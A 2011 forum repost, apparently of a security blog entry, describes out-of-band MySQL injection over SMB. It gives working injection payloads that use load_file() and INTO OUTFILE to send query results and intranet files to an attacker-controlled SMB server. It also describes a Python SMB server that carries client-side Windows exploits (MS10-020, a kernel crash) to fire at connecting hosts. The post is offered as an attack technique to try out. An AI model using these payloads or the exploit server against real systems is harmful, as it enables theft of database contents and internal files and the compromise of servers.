Paul4games Posted June 2, 2011 Report Posted June 2, 2011 Over the past week i have been busy in the lab developing new attack vectors to MySQL injections by using the inter protocol capability with the load_file() function.With load_file(); you are able to load files from another machine over SMB, this happens through the underlaying system’s SMB client, a basic load_file() over SMB looks like this:1select load_file("\\\\[ip | server_name]\\filename");But also this will initialize a SMB connection:1select 1 INTO OUTFILE "\\\\[ip | server_name]\\filename]";In fact, Fredrik wrote about this INTO OUTFILE problem as in a way for malware to easy spread in internal networks.After playing around i found ways of using concat() inside load_file(), this made MySQL injections look like this:1select load_file(concat("\\\\[ip | server_name]\\", version()))Which made everything so much easier, with this we can entirely abandon the stupid delay attacks with benchmark techniques, blind MySQL injections and maybe even replace the current basic MySQL injections because of the ease of the query’s and you don’t even have to look how much columns are selected.Now the other side of the injection, It uses the default SMB client which means that if you are able to exploit this thing while connecting to you, you can do a lot more with the system.I coded SMB server for this in Python and inserted for now just 2 exploits (but there will come more i suppose since i will be maintaining this program and making it stable over the next couple of weeks).The program can be found here.For now i embedded the following exploits:MS10-020 stack overflow Windows 7/2008R2; trans2 response stack overflowWin7_remote_kernel_boom; NetBIOS length field crashHere is a screen shot of MS10-020 in action to give you a basic idea of what i am talking about.Okay, that was just a little sidestep but this program is basically for grabbing the strings which are being defined in the MySQL injection.It will look something like this.You let the server connect to you over port 445 with it’s favorite SMB client, you catch what happens and you won.This trick is basicly also possible with bigger files instead of just tiny strings by using INTO OUTFILE, in fact you can just dump entire files from the local network that way.example:1http://extranet/index.php?id=1 UNION ALL SELECT 1,2,load_file("\\\\intranet\\filename"),3,4 INTO OUTFILE "\\\\Your_SMB_server\\test";This will proxy the file in the intranet over SMB to you.I suppose this is not only working on MySQL and with investigation i suppose you can go out of band similar ways in other database level programs, this is just to break the ice and make you realize how useful it is when you are capable of going out of band with SMB.Blind MySQL injections are a lot better to exploit this way because you are capable of defining entire strings and not having to calculate every single character based on true/false responses or with delay tricks and client side SMB exploitation will have a lot bigger future with the introduction of this.I hope i provided enough information here for you to make as much fun with this as i did over the past few days and keep me posted if you find other cool tricks possible with this feature.Autor:Jelmer de HenSursa:Ack Ack « Go beyond the impossible!Mie mi s-a parut articolul foarte interesant si blogul de asemenea are o multime de posturi de calitate,a si era sa si uit hen a creat si un toolkit pentru a creea un server smb la tine pe pc:MySQL network exploitation toolkit 1.1 Quote
